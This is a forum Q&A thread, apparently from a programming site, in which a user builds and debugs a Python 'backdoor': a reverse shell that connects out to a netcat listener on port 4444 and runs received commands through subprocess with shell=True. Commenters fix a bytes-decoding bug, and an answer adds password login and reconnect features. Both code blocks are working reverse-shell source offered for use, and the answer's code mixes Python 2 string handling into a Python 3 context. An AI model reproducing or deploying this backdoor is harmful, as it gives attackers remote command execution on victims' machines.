# Python backdoor

Tags: python, remote-access

So hello everybody, Im building a python backdoor. So when I start the netcat for listener and I start the backdoor it connects and everything but when I type ipconfig for example it says "The specified file directory cannot be found" or something like that. Here is the code:

```
#!/usr/bin/python

import socket
import subprocess

HOST = '192.168.1.7' # IP for remote connection
PORT = 4444 # Port for remote connection

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))
s.send(b'\nYou are connected !\n\nConsole > ')

while 1:
    data = s.recv(1024)

    if data == 'quit' : break

    proc = subprocess.Popen(str(data), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    stdoutput = proc.stdout.read() + proc.stderr.read()

    s.send(b'\n' + stdoutput)

# Exiting
s.send(b'\nExiting...\n')
s.close()
```

Comment: `print(repr(data))` so we can see what data went through, and also try the same use of `Popen` without the sockets stuff. Your problem is either related to sockets or Popen, not both, so isolate it.

Comment: Here is an data: b'ipconfig\n' I understand the problem now but I don't know how to fix it

Comment: You understand the problem now? What is it? And what happens if you just set `data = b'ipconfig\n'` and remove all the sockets code?

Comment: I understand that data can't be b'ipconfig\n' so it must be just ipconfig but I don't know how to fix it, when I but that and remove socket code it just starts and exits

Comment: You're seeing the extra characters like `b'` because I told you to print the `repr`, which was intentional, it provided more info. If you just `print(data)` they won't show. Also did you `print(stdoutput)` to see what it did?

Comment: When I put print(stdoutput) it printed: b'The system cannot find the path specified.\r\n' and on listener it showed The system cannot find the path specified.

Comment: And what happens when you type `ipconfig` in a terminal?

Comment: It gives an error: The system cannot find the path specified. But I notoces when I put the command to where the data should be it works, so for an example: proc = subprocess.Popen('ipconfig', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE). And when I type something it will guve ip information

Comment: And also thanks for helping this much

Comment: You're not being very clear. What's the difference between when you type it at a terminal and put it through Popen?

Comment: Look when I leave it like this: proc = subprocess.Popen(str(data), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) and connect it with the listener(netcat) and then in the listener type ipcondig it gives an error. But when I put it like this proc = subprocess.Popen('ipconfig', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) and connect the listener and type anything it gives ipconfig information. So in Popen I changed the str(data) with 'ipconfig'

Comment: OK, try out all of the following: `b'ipconfig',b'ipconfig\n',str(b'ipconfig'),str(b'ipconfig\n'),'ipconfig\n'`

Comment: So I've just learned that I misunderstood how `bytes` (e.g. `b'ipconfig'`) work in Python 3. I assumed that the quotes and such would go away with `str` and I'm surprised to see that they don't. Use `data` by itself, not `str(data)` and see how that works. If it doesn't, try `data.decode('utf8')`.

Comment: Yes it is data.decode() !! Thank you so much !!

Answer (score 0):

### Try this:

Hope its not too much. I added a few features as well.
You're godamm welcome :)

```
#!/usr/bin/python

# Import the required librarys for the job
import subprocess
import socket
import os

# Set variables used in the script
HOST = '10.0.0.98' # IP for remote connection
PORT = 4444 # Port for remote connection
PASS = 'Te$t!2#456' # For making the script secure

# Create the socket that will be used
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# This method will be used for handling the exit when you type -quit
def Quit():
       s.send('    [<] Hope to see you soon :)\n')
       s.close()
       Connect()

# This method will wait until the connection is alive
def Connect():
       s.connect((HOST, PORT))                                                                                      
       s.send('''\n
    +--------------------+
    | You are connected! |
    +--------------------+
    | X IS Something err!! |
    | < IS Incomming!!     |
    | > IS Outgoing!!       |
    +--------------------+

    ''')
       Login()

# Ask for login; if they do not get it right it will ask again ect ect etc
def Login():
       s.send('    [>] Please login #>> ')
       pwd = s.recv(1024)

       if pwd.strip() == PASS:
              Shell()
       else:
              s.send('    [X] Incorrect Login!!\n')
              Login()

# Main method -- Hope I'm not pissing you off by calling it a method, I'm used to C# lol ;)
def Shell():
       s.send('    [<] We\'re in :)\n    [>]-{ ' + os.curdir + ' } Console #>> ')
       while 1:
           data = s.recv(1024)

           # Make sure that you use '-quit'!!
           if data.upper()[:5] == '-QUIT' : break

           proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
           stdoutput = "    [<] " + proc.stdout.read() + proc.stderr.read()
           s.send('\n\n' + stdoutput + '\n\n')
           s.send('    [>]-{ ' + os.curdir + ' } Console #>> ')
       Quit()
Connect()
```